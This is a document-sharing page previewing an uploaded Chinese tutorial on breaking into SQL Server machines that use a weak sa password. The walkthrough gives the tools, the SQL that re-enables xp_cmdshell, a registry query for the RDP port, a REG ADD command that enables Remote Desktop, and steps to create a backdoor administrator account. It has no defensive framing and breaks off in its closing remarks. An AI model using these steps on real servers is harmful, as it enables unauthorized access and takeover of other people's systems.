使用SQL弱口令入侵SQL服务器的探讨.doc_第1页
使用SQL弱口令入侵SQL服务器的探讨.doc_第2页
使用SQL弱口令入侵SQL服务器的探讨.doc_第3页
使用SQL弱口令入侵SQL服务器的探讨.doc_第4页
使用SQL弱口令入侵SQL服务器的探讨.doc_第5页
已阅读5页,还剩3页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

使用SQL弱口令入侵SQL服务器使用的工具:扫描工具X-scan SQL查询分析器 SQLtools命令集成版环境:Windows xp和Windows Server 2003企业版1、在网络内扫描到一台SQL Server服务器,且sa密码为弱口令1232、通过 SQLtools命令集成版这个软件,我们可以连上这台SQL Server服务器,如下图所示3、虽然我们能succeed连接到SQL Server服务器,但是在我们执行dir c:查看c盘文件时候,可能会报错,基于这种情况,我们可以使用SQL 查询分析器,修正该错误信息4、打开SQL Server查询分析器,输入IP地址和sa帐号及密码5、在查询分析器里输入SQL语句,并执行SQL语句:;EXEC sp_configure show advanced options, 1 - ;RECONFIGURE WITH OVERRIDE - ;EXEC sp_configure xp_cmdshell, 1 - ;RECONFIGURE WITH OVERRIDE - ;EXEC sp_configure show advanced options, 0 - 6、这时,我们在执行dir c:命令查看c盘下的文件,查询成功7、在SQLtools工具的dos命令窗口,执行netstat -an查看3389端口是否打开8、同时使用SQL命令需要查询默认的3389端口是否已经被更改SQl命令查询3389端口是否被更改:exec xp_regread HKEY_LOCAL_MACHINE,SYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp,PortNumber9、很显然,默认3389端口没有被修改,那么我们就可以执行dos命令,开启SQL Server服务器的3389端口DOS命令:REG ADD HKLMSYSTEMCurrentControlSetControlTerminal Server /v fDenyTSConnections /t REG_DWORD /d 0 /f10、再次查询SQl Server的3389端口是否已经打开 (很明显我们已经成功开启对方的3389端口)11、这时我们可以使用我们熟悉的dos命令对该SQL Server服务器新建用户,并加入到Administrators组12、现在,我们就可以是用远程桌面连接这台SQL Server服务器了备注:一:现在的SQL Server服务器弱口令,个人感觉扫描到的几率微乎其微二:如果对方没开启远程桌面,那么即使建立了自己的帐号,岂不也只能望而兴叹三:如果对方开启了远程桌面,但是设置了IPsec策略,仅运行特定的IP段或IP地址访问,那么.本文
人人文库> 全部分类> 生活休闲 > 科普知识

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

最新文档

评论

0/150

提交评论